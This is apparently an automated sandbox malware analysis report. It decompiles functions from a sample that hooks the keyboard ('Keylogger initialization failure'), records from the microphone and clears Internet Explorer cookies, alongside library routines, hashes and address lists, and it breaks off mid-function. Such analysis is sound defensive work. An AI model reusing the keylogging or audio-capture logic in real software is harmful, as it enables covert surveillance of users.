                    • CloseHandle.KERNEL32(00000000,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 004070C1
                    • MoveFileW.KERNEL32(00000000,00000000), ref: 004070DE
                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407109
                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407119
                      • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00472EE0,00404C29,00000000,?,?,?,00472EE0,?), ref: 00404B85
                      • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                    • String ID: .part
                    • API String ID: 1303771098-3499674018
                    • Opcode ID: 05df109e2b3601ffd37186bfbcbdfdb56a4cb75ed44805870253dedc4343bf7e
                    • Instruction ID: e251a7d4a1aabd80805b5d7196bb96980f3888c3ff40e4c14fed717d8046ce17
                    • Opcode Fuzzy Hash: 05df109e2b3601ffd37186bfbcbdfdb56a4cb75ed44805870253dedc4343bf7e
                    • Instruction Fuzzy Hash: FE318571508301AFC210EB61DC859AFB7ECEB94355F40493FF945A21D2DB78EA488B9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B463 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E0040B463(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				void* _t60;
				void* _t62;
				void* _t63;
				void* _t64;

				_t42 =  &_v28;
				E004020BF(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E0041288E( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t64 = _t63 + 0xc;
				E00401FC2( &_v28, 0x80000001, _t60, _t17);
				E00401FB8();
				_t59 = 0x464074;
				_t20 = E00405AE5(0x464074);
				_t68 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(E00401F8B( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00402073(0,  &_v52, 0x464074, _t62,  &_v340);
						_t59 =  &_v52;
						_t34 = E0041AC0A(E00401EE4(E0041A7B9( &_v76,  &_v52)),  &_v52);
						E00401EE9();
						E00401FB8();
						__eflags = _t34;
						if(__eflags == 0) {
							__eflags = E00406155(0x473950, "XP", 0);
							if(__eflags != 0) {
								_t41 = 1;
								E00402073(1, _t64 - 0x18,  &_v52, _t62, "\n[IE cookies cleared!]");
								E0040B752(1,  &_v52, _t62, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t64 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t64 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00402073(_t41, _t48, _t59, _t62);
					E0040B752(_t41, _t59, _t62, _t68);
					_t41 = 1;
					L8:
				}
				E00401FB8();
				return _t41;
			}





















                    0x0040b46c
                    0x0040b471
                    0x0040b476
                    0x0040b489
                    0x0040b48b
                    0x0040b490
                    0x0040b497
                    0x0040b49f
                    0x0040b4a4
                    0x0040b4ac
                    0x0040b4b1
                    0x0040b4b3
                    0x0040b4e5
                    0x0040b4f8
                    0x0040b4fa
                    0x00000000
                    0x0040b4fc
                    0x0040b506
                    0x0040b50b
                    0x0040b51f
                    0x0040b529
                    0x0040b531
                    0x0040b536
                    0x0040b538
                    0x0040b559
                    0x0040b55b
                    0x0040b560
                    0x0040b569
                    0x0040b56e
                    0x00000000
                    0x0040b56e
                    0x0040b53a
                    0x0040b53d
                    0x0040b53f
                    0x00000000
                    0x0040b53f
                    0x0040b538
                    0x0040b4b5
                    0x0040b4b5
                    0x0040b4b8
                    0x0040b4ba
                    0x0040b4bf
                    0x0040b4bf
                    0x0040b4c4
                    0x0040b4c9
                    0x0040b573
                    0x0040b573
                    0x0040b579
                    0x0040b585

                    APIs
                      • Part of subcall function 0041288E: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004128B2
                      • Part of subcall function 0041288E: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004128CF
                      • Part of subcall function 0041288E: RegCloseKey.KERNELBASE(?), ref: 004128DA
                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B4E5
                    • PathFileExistsA.SHLWAPI(?), ref: 0040B4F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$P9G$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                    • API String ID: 1133728706-1387963244
                    • Opcode ID: b1c7d62a7e2ac61be5ff86610abc16fbec87eceec088e68235dbd549a9611b7b
                    • Instruction ID: ea656425d40d7a45f5e056d43768dd8003def9e5f0b6d0ab8c53a167709f9c7c
                    • Opcode Fuzzy Hash: b1c7d62a7e2ac61be5ff86610abc16fbec87eceec088e68235dbd549a9611b7b
                    • Instruction Fuzzy Hash: DB214F31A402096ACB04F7E1DD96EEE77689E51708F40017FB901772C2EB7C9A45C6DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401BC9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71COMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E00401BC9(void* __eflags) {
				signed short _t3;
				signed int _t7;
				signed int _t15;
				signed int _t24;
				signed int _t25;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;

				_t35 = __eflags;
				CreateDirectoryW(E00401EE4(0x472d40), 0);
				_t3 = 8;
				 *0x470ab6 = _t3;
				 *0x470aac = 0x1f40;
				 *0x470ab0 = 0x1f40;
				0x470aa8->wFormatTag = 1;
				 *0x470aaa = 1;
				 *0x470ab4 = 1;
				 *0x470ab8 = 0;
				_t7 = E0043A3AC(_t5, E00401F8B(E00401E45(0x473298, 1, _t33, _t35, 0x24)));
				_t24 =  *0x470aac; // 0x0
				 *_t34 = 0x30008;
				_t25 = _t24 * _t7 * 0x3c;
				 *0x470abc = _t25;
				 *0x470ac4 = (( *0x470ab6 & 0x0000ffff) >> 3) * _t25;
				waveInOpen(0x470ac0, 0xffffffff, 0x470aa8, E00401CEB, 0, ??);
				E00401F7D( *0x470ac4);
				0x470a88->lpData = E00401F8B(0x472d58);
				_t15 =  *0x470ac4; // 0x0
				 *0x470a8c = _t15;
				 *0x470a90 = 0;
				 *0x470a94 = 0;
				 *0x470a98 = 0;
				 *0x470a9c = 0;
				waveInPrepareHeader( *0x470ac0, 0x470a88, 0x20);
				waveInAddBuffer( *0x470ac0, 0x470a88, 0x20);
				waveInStart( *0x470ac0);
				return 0;
			}











                    0x00401bc9
                    0x00401bd9
                    0x00401be1
                    0x00401be7
                    0x00401bef
                    0x00401bf6
                    0x00401bfe
                    0x00401c0c
                    0x00401c13
                    0x00401c1a
                    0x00401c2d
                    0x00401c32
                    0x00401c3b
                    0x00401c4d
                    0x00401c64
                    0x00401c6a
                    0x00401c6f
                    0x00401c82
                    0x00401c95
                    0x00401c9a
                    0x00401ca6
                    0x00401cab
                    0x00401cb1
                    0x00401cb7
                    0x00401cbd
                    0x00401cc3
                    0x00401cd2
                    0x00401cde
                    0x00401ce8

                    APIs
                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                    • waveInOpen.WINMM(00470AC0,000000FF,00470AA8,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                    • waveInPrepareHeader.WINMM(00470A88,00000020), ref: 00401CC3
                    • waveInAddBuffer.WINMM(00470A88,00000020), ref: 00401CD2
                    • waveInStart.WINMM ref: 00401CDE
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                    • String ID: @-G$X-G
                    • API String ID: 1356121797-233566475
                    • Opcode ID: b0ca4a2526d5f22ff98bca90ea7e13aed92d536af1f6e02292cbd3d0dc651b83
                    • Instruction ID: d9f75f8a904554b1551795dc4e374556cb90ebe8a53537c147534bfad38ff794
                    • Opcode Fuzzy Hash: b0ca4a2526d5f22ff98bca90ea7e13aed92d536af1f6e02292cbd3d0dc651b83
                    • Instruction Fuzzy Hash: 5C213771616300DBC754AFAAFC09A6A7BA9EBB5315F00843EB10DD76F1DBB844818B5C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004098BB Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 91%
                    			E004098BB(struct HHOOK__** __ecx) {
				struct tagMSG _v32;
				char _v60;
				void* _v64;
				void* __edi;
				void* __ebp;
				int _t7;
				void* _t8;
				struct HHOOK__* _t14;
				void* _t16;
				void* _t22;
				struct HHOOK__** _t34;
				void* _t36;
				signed int _t37;
				void* _t39;

				_t39 = (_t37 & 0xfffffff8) - 0x38;
				_t34 = __ecx;
				 *0x470b24 = __ecx;
				if( *((intOrPtr*)(__ecx)) != 0) {
					goto L3;
				} else {
					_t14 = SetWindowsHookExA(0xd, E004098A7, GetModuleHandleA(0), 0);
					 *_t34 = _t14;
					_t44 = _t14;
					if(_t14 != 0) {
						while(1) {
							L3:
							_t7 = GetMessageA( &_v32, 0, 0, 0);
							__eflags = _t7;
							if(_t7 == 0) {
								break;
							}
							TranslateMessage( &_v32);
							DispatchMessageA( &_v32);
							__eflags =  *_t34;
							if( *_t34 != 0) {
								continue;
							}
							break;
						}
						_t8 = 0;
						__eflags = 0;
					} else {
						_t16 = E0041A6E9(_t22,  &_v60, GetLastError());
						_t40 = _t39 - 0x18;
						E004052DD(_t22, _t39 - 0x18, "Keylogger initialization failure: error ", _t36, _t44, _t16);
						E00402073(_t22, _t40 - 0x14, "Keylogger initialization failure: error ", _t36, "E");
						E0041A04A(_t22, 0);
						E00401FB8();
						_t8 = 1;
					}
				}
				return _t8;
			}

















                    0x004098c1
                    0x004098c5
                    0x004098ca
                    0x004098d2
                    0x00000000
                    0x004098d4
                    0x004098e4
                    0x004098ea
                    0x004098ec
                    0x004098ee
                    0x00409936
                    0x00409936
                    0x0040993e
                    0x00409944
                    0x00409946
                    0x00000000
                    0x00000000
                    0x0040994d
                    0x00409958
                    0x0040995e
                    0x00409960
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00409960
                    0x00409962
                    0x00409962
                    0x004098f0
                    0x004098fc
                    0x00409901
                    0x0040990c
                    0x0040991b
                    0x00409920
                    0x0040992c
                    0x00409933
                    0x00409933
                    0x004098ee
                    0x00409969

                    APIs
                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004098D6
                    • SetWindowsHookExA.USER32 ref: 004098E4
                    • GetLastError.KERNEL32 ref: 004098F0
                      • Part of subcall function 0041A04A: GetLocalTime.KERNEL32(00000000), ref: 0041A064
                    • GetMessageA.USER32 ref: 0040993E
                    • TranslateMessage.USER32(?), ref: 0040994D
                    • DispatchMessageA.USER32 ref: 00409958
                    Strings
                    • Keylogger initialization failure: error , xrefs: 00409904
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                    • String ID: Keylogger initialization failure: error
                    • API String ID: 3219506041-952744263
                    • Opcode ID: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                    • Instruction ID: c40f6cef292aa3bb57f49984c9f8b97dc6da6adf0f265d4e9e2bb6cec8c4e7f3
                    • Opcode Fuzzy Hash: 5eb3846367dd77e5cedd36d7bc288ea53f4e71e00e665bcf1e48dc65110d979c
                    • Instruction Fuzzy Hash: E81154726053016BC7107B76EC0A86B77ECDB95715F10467EF891E22A2EB38D940C76A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004494C9 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 69%
                    			E004494C9(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46f00c; // 0x54ba778e
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00444FE6(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E004338BB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00434713(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00447433(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00434713(_t101);
									goto L36;
								}
								_t62 = E00447433(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00434713(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00444A38(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00455A90();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00447433(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00444A38(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00455A90();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                    0x004494ce
                    0x004494cf
                    0x004494d0
                    0x004494d7
                    0x004494db
                    0x004494dc
                    0x004494e2
                    0x004494e8
                    0x004494ee
                    0x004494f1
                    0x004494f1
                    0x004494f4
                    0x004494f6
                    0x004494f6
                    0x004494f4
                    0x004494f8
                    0x004494fd
                    0x00449504
                    0x00449507
                    0x00449507
                    0x00449523
                    0x00449529
                    0x0044952e
                    0x004496c1
                    0x004496d4
                    0x00449534
                    0x00449534
                    0x00449537
                    0x0044953c
                    0x00449540
                    0x00449594
                    0x00449594
                    0x00449596
                    0x00449598
                    0x004496b6
                    0x004496b6
                    0x004496b8
                    0x004496b9
                    0x00000000
                    0x004496bf
                    0x004495a9
                    0x004495af
                    0x004495b1
                    0x00000000
                    0x00000000
                    0x004495b7
                    0x004495c9
                    0x004495ce
                    0x004495d2
                    0x00000000
                    0x00000000
                    0x004495df
                    0x00449619
                    0x0044961c
                    0x0044961f
                    0x00449621
                    0x00449623
                    0x00449625
                    0x00449671
                    0x00449671
                    0x00449673
                    0x00449673
                    0x00449675
                    0x004496af
                    0x004496b0
                    0x00000000
                    0x004496b5
                    0x00449689
                    0x0044968e
                    0x00449690
                    0x00000000
                    0x00000000
                    0x00449694
                    0x00449695
                    0x00449696
                    0x00449699
                    0x004496d5
                    0x004496d8
                    0x0044969b
                    0x0044969b
                    0x0044969c
                    0x0044969c
                    0x004496a9
                    0x004496ab
                    0x004496ad
                    0x004496de
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004496ad
                    0x00449627
                    0x0044962a
                    0x0044962c
                    0x0044962e
                    0x00449630
                    0x00449633
                    0x00449638
                    0x00449653
                    0x00449655
                    0x0044965f
                    0x00449661
                    0x00449662
                    0x00449664
                    0x00000000
                    0x00000000
                    0x00449666
                    0x0044966c
                    0x0044966c
                    0x00000000
                    0x0044966c
                    0x0044963a
                    0x0044963c
                    0x00449640
                    0x00449645
                    0x00449647
                    0x00449649
                    0x00000000
                    0x00000000
                    0x0044964b
                    0x00000000
                    0x0044964b
                    0x004495e1
                    0x004495e6
                    0x00000000
                    0x00000000
                    0x004495ec
                    0x004495ee
                    0x00000000
                    0x00000000
                    0x00449605
                    0x0044960a
                    0x0044960e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00449614
                    0x00449547
                    0x00449549
                    0x0044954b
                    0x00449553
                    0x00449572
                    0x00449574
                    0x0044957e
                    0x00449580
                    0x00449581
                    0x00449583
                    0x00000000
                    0x00000000
                    0x00449589
                    0x0044958f
                    0x0044958f
                    0x00000000
                    0x0044958f
                    0x00449557
                    0x0044955b
                    0x00449560
                    0x00449564
                    0x00000000
                    0x00000000
                    0x0044956a
                    0x00000000
                    0x0044956a

                    APIs
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 00449523
                    • __alloca_probe_16.LIBCMT ref: 0044955B
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042C60C,?,?,?,0044971A,00000001,00000001,?), ref: 004495A9
                    • __alloca_probe_16.LIBCMT ref: 00449640
                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004496A3
                    • __freea.LIBCMT ref: 004496B0
                      • Part of subcall function 00444A38: RtlAllocateHeap.NTDLL(00000000,00433B6F,?,P@,00437117,?,?,00000000,?,P@,0040D366,00433B6F,?,?,?,?), ref: 00444A6A
                    • __freea.LIBCMT ref: 004496B9
                    • __freea.LIBCMT ref: 004496DE
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 3864826663-0
                    • Opcode ID: c26f59f17cb63017309268d6e2a54a5d3af622c0da74579a986ce8ca93dbc3e9
                    • Instruction ID: 16b5e23e06f44e8f5b9cde4bfd472c7b38c402739d6472c7ebbca8c933d1a93d
                    • Opcode Fuzzy Hash: c26f59f17cb63017309268d6e2a54a5d3af622c0da74579a986ce8ca93dbc3e9
                    • Instruction Fuzzy Hash: C7510572A00216AFFB259F65CC81EBF77A9EB44750F16462EFC05D7240EB38DC50A698
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004184EE Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00418527
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418548
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418568
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 0041857C
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00418592
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185AF
                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004185CA
                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 004185E6
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InputSend
                    • String ID:
                    • API String ID: 3431551938-0
                    • Opcode ID: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                    • Instruction ID: 0947e47258becacd92e061a94fe1ad349a6366cffbcd8e1d8fee47d4855f6fd4
                    • Opcode Fuzzy Hash: 7d215fb67b09a99a4312223830ed08cf21abfe0e7ede0b47ac2bedd79d27f7c4
                    • Instruction Fuzzy Hash: 9C318131558309BEE311CF51DD41BEBBBDCEF98B54F00080FF6808A191D6A695C98BA7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00445DF1 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 87%
                    			E00445DF1(void* __ebx, signed int __ecx, void* __edi, void* __esi, char _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				void* _v64;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				void* _t177;
				signed short* _t179;
				intOrPtr* _t180;
				intOrPtr* _t181;
				signed int* _t183;
				signed int _t184;
				signed int** _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;

				_t149 = __ecx;
				_t86 =  *0x46f00c; // 0x54ba778e
				_v8 = _t86 ^ _t187;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t183 = _a20;
				_v32 = _t183;
				_t91 = _a8;
				if(_t91 == 0) {
					_t179 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t179 =  *(_t143 + 0x158);
					} else {
						_t179 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t194 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E004470EB(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
					} else {
						_t129 = E0044722D(0, _t183, _t194,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t184 = 0;
							__eflags = 0;
							L18:
							_v28 = _t184;
							if(_t184 == 0) {
								L30:
								E00434713(0);
								_t183 = _v32;
								while(1) {
									L113:
									_t172 =  *_t179 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t183;
									if( *_t183 == 0) {
										L28:
										L29:
										return E004338BB(_v8 ^ _t187);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t179;
									_t144 = _t179;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t84 =  &_v52; // 0x446368
												_t98 = E004451BB(_t145, _t153, _t179,  *_t84, _t97, _v48, _v40, _t183, _t145, _v32);
												_t188 = _t188 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E0043EEAD())) = 0x16;
													goto L29;
												}
												L112:
												_t179 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t179 =  &(_t179[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t183 =  *_t183 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
